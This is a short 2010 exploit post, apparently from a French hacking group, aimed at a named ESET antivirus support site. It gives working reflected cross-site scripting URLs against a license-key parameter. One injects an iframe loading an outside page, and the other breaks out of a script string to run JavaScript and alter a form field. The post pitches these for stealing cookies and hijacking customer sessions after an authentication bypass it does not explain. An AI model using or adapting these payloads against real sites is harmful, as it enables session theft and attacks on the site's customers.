+-----------------------------------------------------------+
|      Stupid XSS + "Auth ByPass" athena-gs.fr              |
+-----------------------------------------------------------+
| Author : FlUxIuS from Slashon and HandGrep                |
| Date : 14/06/2010                                         |
+-----------------------------------------------------------+

Introduction
=============

Athena Global Services is a support of ESET Antivirus sofware in France.
In this exploit, I just would like show how is simply to use this vulnerability against customers, after bypassing
the authenfication page by a Magic research ^_^'... (Cookies Stealing and Session hijacking for example).


The exploit
===========

[Iframe] : https://www.athena-gs.fr/dexter/reg_keys/index.php?lic2use=%3C/script%3E%3Ciframe%20width=%22100%%22%20height=%22300px%22%20src=%22http://www.bonjourinfirmiere.fr/post/695159180/proposee-par-zedacen%22%3E%3C/iframe%3E
[Javascript] : index.php?lic2use=999%22;%20alert(%22huhu%22);%20theDoc.Register_Key.value=%22488

and so on...

Credits
=======
(fr) http://www.slashon.com/index.php/2010-06-14/crackmefr_athena_global_episode1_la_menace_fantome